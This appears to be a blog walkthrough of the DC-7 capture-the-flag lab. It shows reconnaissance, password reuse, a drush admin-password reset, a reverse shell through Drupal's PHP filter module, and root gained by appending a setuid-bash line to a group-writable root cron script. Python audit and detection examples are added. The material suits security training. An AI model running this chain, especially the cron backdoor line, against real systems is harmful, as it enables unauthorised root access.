DC-7 target machine

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.126
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 02:59 EDT
Nmap scan report for 192.168.56.126
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:A8:C2:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds

Only two ports are open.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.126
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 03:00 EDT
Nmap scan report for 192.168.56.126
Host is up (0.00052s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp open|filtered upnp
4500/udp closed nat-t-ike
49152/udp open|filtered unknown
MAC Address: 08:00:27:A8:C2:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.84 seconds

The UDP scan turned up nothing.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.126
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 03:03 EDT
Nmap scan report for 192.168.56.126
Host is up (0.00077s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
| 256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_ 256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Welcome to DC-7 | D7
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-generator: Drupal 8 (https://www.drupal.org)
MAC Address: 08:00:27:A8:C2:95 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.76 seconds

There is a robots.txt file; let's run the nmap vuln scripts against the host.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.56.126
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 03:07 EDT
Nmap scan report for 192.168.56.126
Host is up (0.00042s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.126
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.56.126:80/
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/user/login
| Form id: user-login-form
| Form action: /user/login
|
| Path: http://192.168.56.126:80/user/login
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/node/1
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/search/node
| Form id: search-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/search/node
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/user/password
| Form id: user-pass
| Form action: /user/password
|
| Path: http://192.168.56.126:80/user/password
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/user/login
| Form id: user-login-form
| Form action: /user/login
|
| Path: http://192.168.56.126:80/user/login
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/node/
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/search/node/help
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/search/node
| Form id: search-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/search/node
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/search/node
| Form id: search-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/search/node
| Form id: search-block-form
| Form action: /search/node
|
| Path: http://192.168.56.126:80/search/node/
| Form id: search-form
| Form action: /search/node/
|
| Path: http://192.168.56.126:80/search/node/
| Form id: search-block-form
|_ Form action: /search/node
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /rss.xml: RSS or Atom feed
| /robots.txt: Robots file
| /INSTALL.txt: Drupal file
| /: Drupal version 8
|_ /README.txt: Interesting, a readme.
MAC Address: 08:00:27:A8:C2:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 115.43 seconds

Still nothing useful, so let's look at the web interface.

Looking at the web service

The site states that brute-forcing and directory brute-forcing are useless and that you need to look outside the box. That hint held me up for a long time; I even tried a recent Drupal exploit to see whether it would get me in, and it failed. The only thing I could confirm, via the password-reset page, was that DC7USER is a valid username.

Open-source intelligence

Only after glancing at a writeup did I realise that @DC7USER is the kind of handle usually seen on GitHub or Twitter accounts. Partly it was my own lack of sensitivity to such clues, partly a matter of my online habits.

Following the GitHub link, it turns out to be the source code of the site's backend, which makes sense. From there the path is straightforward: find the configuration file and check whether the database password is reused.

Password reuse

Logging into the backend with that username and password failed; since port 22 is also open, I tried SSH instead.

┌──(kali㉿kali)-[~/Downloads/dc_7]
└─$ ssh dc7user@192.168.56.127
The authenticity of host '192.168.56.127 (192.168.56.127)' can't be established.
ED25519 key fingerprint is SHA256:BDWqBUcitB8KKGYDyoeZkt2C/aXhZ7gi5xSEtOSB+Rk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.127' (ED25519) to the list of known hosts.
dc7user@192.168.56.127's password:
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$ whoami
dc7user
dc7user@dc-7:~$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
dc7user@dc-7:~$ sudo -l
-bash: sudo: command not found
dc7user@dc-7:/usr/bin$ uname -a
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux

Let's see whether there is anything valuable in the home directory.

dc7user@dc-7:~$ ls -liah
total 40K
262914 drwxr-xr-x 5 dc7user dc7user 4.0K Aug 30 2019 .
262321 drwxr-xr-x 3 root root 4.0K Aug 29 2019 ..
143381 drwxr-xr-x 2 dc7user dc7user 4.0K Aug 30 2019 backups
269898 lrwxrwxrwx 1 dc7user dc7user 9 Aug 29 2019 .bash_history -> /dev/null
268307 -rw-r--r-- 1 dc7user dc7user 220 Aug 29 2019 .bash_logout
268283 -rw-r--r-- 1 dc7user dc7user 3.9K Aug 29 2019 .bashrc
271693 drwxr-xr-x 3 dc7user dc7user 4.0K Aug 29 2019 .drush
143656 drwx------ 3 dc7user dc7user 4.0K Aug 29 2019 .gnupg
272762 -rw------- 1 dc7user dc7user 7.8K Aug 30 2019 mbox
268426 -rw-r--r-- 1 dc7user dc7user 675 Aug 29 2019 .profile

There is an mbox file and .drush and .gnupg directories; let's ask ChatGPT what they are.

Inside the .drush directory there is no yml file, so let's look at mbox first.

dc7user@dc-7:~$ cat mbox

From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EPu-0000CV-5C
for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

The cron job file

This looks like a mail notification, and it mentions /opt/scripts/backups.sh; let's look at that file.

dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

dc7user@dc-7:/opt/scripts$ ls -alih
total 12K
269846 drwxr-xr-x 2 root www-data 4.0K Aug 29 2019 .
262385 drwxr-xr-x 3 root root 4.0K Aug 29 2019 ..
272756 -rwxrwxr-x 1 root www-data 520 Aug 29 2019 backups.sh

This looks like a cron job: it periodically backs up the files, encrypts them with gpg, and stores the result in the backups directory of the user's home. Another interesting point: the file is owned by root but belongs to the www-data group, and group members have write permission on it. So the next step is to think about how to log into the backend and get a reverse shell. One more question is the gpg usage in the script above; ask ChatGPT about it.
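As an added example (not part of the original writeup), the following Python audit performs the check a defender would run against this finding: it parses system-crontab lines, then flags each launched script that is group- or world-writable while running as root, and any passphrase passed on the command line. The crontab text is constructed for the demo; the script body is the backups.sh shown above, recreated in a temporary directory with its 0775 mode.

```python
"""Audit scripts launched from cron for the two weaknesses shown in backups.sh.

Added example, not from the DC-7 writeup: it parses system-crontab lines
(the 6-field form with a user column), then checks each script for
group/world write permission and for a passphrase or password passed on
the command line. The crontab text and the temp-dir copy of the script
are constructed for the demo.
"""
import os
import re
import stat
import tempfile

# Constructed crontab; DC-7 itself only shows the mail that the job sent.
CRONTAB_TEXT = """\
# m h dom mon dow user command
SHELL=/bin/sh
*/15 * * * * root /opt/scripts/backups.sh
0 3 * * *    root /usr/sbin/logrotate /etc/logrotate.conf
"""

# Script body copied from the writeup's /opt/scripts/backups.sh.
BACKUPS_SH = """#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
"""

# A secret handed to a program as an argument is visible in `ps` and in the script itself.
SECRET_FLAG = re.compile(r"--(?:passphrase|password)(?:[= ]\S+)", re.I)


def cron_commands(crontab_text):
    """Yield (user, program) for each system-crontab entry, skipping comments and VAR=value lines."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        yield user, command.split()[0]


def audit_script(path, runs_as="root"):
    """Return a list of findings for one script; an empty list means nothing was flagged."""
    findings = []
    st = os.stat(path)
    if st.st_mode & stat.S_IWGRP:
        findings.append(f"group-writable (gid {st.st_gid}) but runs as {runs_as}")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"world-writable but runs as {runs_as}")
    with open(path, errors="replace") as fh:
        for lineno, text in enumerate(fh, 1):
            if SECRET_FLAG.search(text):
                findings.append(f"line {lineno}: secret passed on the command line")
    return findings


def audit_crontab(crontab_text, resolve=lambda p: p):
    """Audit every script a crontab launches.

    `resolve` maps crontab paths to where they live on disk; the demo uses it
    to point at its temp-dir copy instead of the real filesystem.
    """
    report = {}
    for user, program in cron_commands(crontab_text):
        real = resolve(program)
        if os.path.isfile(real):
            report[program] = audit_script(real, runs_as=user)
    return report


def demo():
    """Recreate backups.sh in a temp dir with DC-7's 0775 mode and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "backups.sh")
        with open(script, "w") as fh:
            fh.write(BACKUPS_SH)
        os.chmod(script, 0o775)  # -rwxrwxr-x, as on the target
        # Everything else resolves into the (empty) temp dir, so only the demo copy is audited.
        return audit_crontab(
            CRONTAB_TEXT,
            resolve=lambda p: script if p.endswith("backups.sh") else os.path.join(tmp, p.lstrip("/")),
        )


if __name__ == "__main__":
    for program, findings in demo().items():
        print(program)
        for finding in findings:
            print("  -", finding)
```

On the target this would report the group-writable bit and both gpg lines; the fix is `chmod 755` (or `chown root:root`) on the script and moving the passphrase into a root-only file read with `--passphrase-file`.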

gpg decryption

So we can try decrypting the backup to get the sql file and look for a login user's password in it.

Decrypting with the command above yields the sql file, which is full of SQL statements. Let's search for the known user dc7user: I opened the file in VS Code, searched, and found the INSERT statement containing the password hash. I tried to crack it, but it is Drupal's own hashing algorithm… john's format list does not include it, and online tools gave no answer either.

Now that gpg has come into play, what can the drush command do?

drush user management

It can manage users, so we can change the admin user's password (the SQL statements show there is also an admin user). Running the command directly produced an error at first.

We switch to the site directory and run the command again.

dc7user@dc-7:/var/www/html$ drush user:password admin --password="123456"
Changed password for admin [success]

Getting a shell through the Drupal backend

The password was changed successfully and I logged into the backend. But I searched for ages without finding a way to upload or modify files to get a shell. I tried searching for "drupal upload php", "drupal upload php file" and "drupal upload php shell"; one video result was How To Upload Shell in Drupal (Easy Way) - YouTube.

The PHP filter module needs to be enabled.

But I could not find it in the interface, so apparently it has to be installed manually.

Looking for where to download this module, I clicked the first link, PHP | Drupal.org.

At the very bottom of the page there is a download link; download the module locally and then upload it to the site.

It installed successfully; then, as in the video, enable it: select the module, scroll to the bottom of the page and choose Install.

The interface reports: Module PHP Filter has been enabled.

Create new content

Choose phpcode as the text format.

At first I put in the simplest PHP snippet, and the connection dropped immediately. I switched to the classic reverse shell.

With the listener running, click save and the reverse shell connects back.

┌──(kali㉿kali)-[~/Downloads/dc_7]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.127] 43874
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
23:26:39 up 23 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
dc7user pts/0 192.168.56.106 23:16 8:23 0.02s 0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Upgrade the shell a bit

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-7:/$ cd /opt/scripts
cd /opt/scripts
www-data@dc-7:/opt/scripts$ ls
ls
backups.sh

Privilege escalation

Modify the sh file

www-data@dc-7:/opt/scripts$ cat backups.sh
cat backups.sh
#!/bin/bash
www-data@dc-7:/opt/scripts$ echo "cp /bin/bash /tmp/bash;chmod +xs /tmp/bash" >> backups.sh
<n/bash /tmp/bash;chmod +xs /tmp/bash" >> backups.sh

After waiting about ten minutes, a bash file appeared in /tmp.
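As an added example (not part of the original writeup), this Python script shows how a defender would catch the two traces this step leaves on the host: a content change to a cron script that runs as root, and a setuid file sitting in a world-writable directory. It builds a constructed directory layout under a temp dir that mirrors /opt/scripts and /tmp, takes a SHA-256 baseline of the script, and then reports both the modification and the setuid file.

```python
"""Detect a tampered root-run cron script and a setuid file in a world-writable directory.

Added example, not from the DC-7 writeup. It keeps a SHA-256 baseline of
watched scripts and reports any content change, and walks world-writable
directories (sticky /tmp-style dirs included) for regular files carrying
the setuid or setgid bit. The directory layout is constructed for the demo.
"""
import hashlib
import os
import stat
import tempfile


def sha256_file(path):
    """Hash a file in chunks so large dumps do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(paths):
    """Map each watched script to its current content hash."""
    return {p: sha256_file(p) for p in paths}


def changed_scripts(base):
    """Return the watched scripts whose content no longer matches the baseline (or that vanished)."""
    return [p for p, digest in base.items()
            if not os.path.exists(p) or sha256_file(p) != digest]


def suid_in_writable_dirs(root):
    """Return (path, mode) for setuid/setgid regular files inside world-writable directories under root."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if not os.lstat(dirpath).st_mode & stat.S_IWOTH:
            continue  # only directories any local user could have dropped a file into
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((full, oct(stat.S_IMODE(st.st_mode))))
    return hits


def demo():
    """Constructed scenario: baseline a script, tamper with it, plant a setuid file in a /tmp-like dir."""
    with tempfile.TemporaryDirectory() as root:
        scripts = os.path.join(root, "opt", "scripts")
        tmp = os.path.join(root, "tmp")
        os.makedirs(scripts)
        os.makedirs(tmp)
        os.chmod(tmp, 0o1777)  # sticky + world-writable, like /tmp

        script = os.path.join(scripts, "backups.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/bash\n")
        base = baseline([script])
        before = changed_scripts(base)  # nothing changed yet

        with open(script, "a") as fh:   # an unexpected line appended by a non-root writer
            fh.write("echo tampered\n")
        after = changed_scripts(base)

        planted = os.path.join(tmp, "bash")  # stand-in for the setuid copy seen in the listing
        with open(planted, "wb") as fh:
            fh.write(b"\x7fELF")
        os.chmod(planted, 0o4755)

        return {"before": before, "after": after, "suid": suid_in_writable_dirs(root)}


if __name__ == "__main__":
    result = demo()
    print("changed scripts:", result["after"])
    print("setuid files in world-writable dirs:", result["suid"])
```

In production the baseline would be stored outside the host (or at least outside any directory the web user can write) and the two checks scheduled more often than the backup job itself; mounting /tmp with `nosuid` removes the second trace entirely, since the kernel then ignores the setuid bit there.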

dc7user@dc-7:/tmp$ ls -laih
total 6.4M
297 drwxrwxrwt 9 root root 4.0K Jul 11 22:15 .
2 drwxr-xr-x 22 root root 4.0K Aug 29 2019 ..
19744 -rwxr-xr-x 1 dc7user dc7user 520 Jul 11 18:55 backups.sh.bak
19749 -rwsr-sr-x 1 root root 1.1M Jul 11 22:15 bash
142361 drwxrwxrwt 2 root root 4.0K Jul 11 18:47 .font-unix
140696 drwxrwxrwt 2 root root 4.0K Jul 11 18:47 .ICE-unix
142662 drwx------ 3 root root 4.0K Jul 11 18:47 systemd-private-08c188e365d948dfb5100a1d5a8a6631-apache2.service-EHVFfc
142543 drwx------ 3 root root 4.0K Jul 11 18:47 systemd-private-08c188e365d948dfb5100a1d5a8a6631-systemd-timesyncd.service-VQL1CO
142541 drwxrwxrwt 2 root root 4.0K Jul 11 18:47 .Test-unix
19747 -rw-r--r-- 1 dc7user dc7user 5.3M Jul 11 21:18 website.sql
131153 drwxrwxrwt 2 root root 4.0K Jul 11 18:47 .X11-unix
141106 drwxrwxrwt 2 root root 4.0K Jul 11 18:47 .XIM-unix
dc7user@dc-7:/tmp$ ./bash -p
bash-4.4# whoami
root
bash-4.4# cd /root
bash-4.4# ls
theflag.txt
bash-4.4# cat theflag.txt




888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888


Congratulations!!!

Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.


DC-7 target machine
https://i3eg1nner.github.io/2023/07/c67b9582251d.html
Author
I3eg1nner
Published on
11 July 2023
License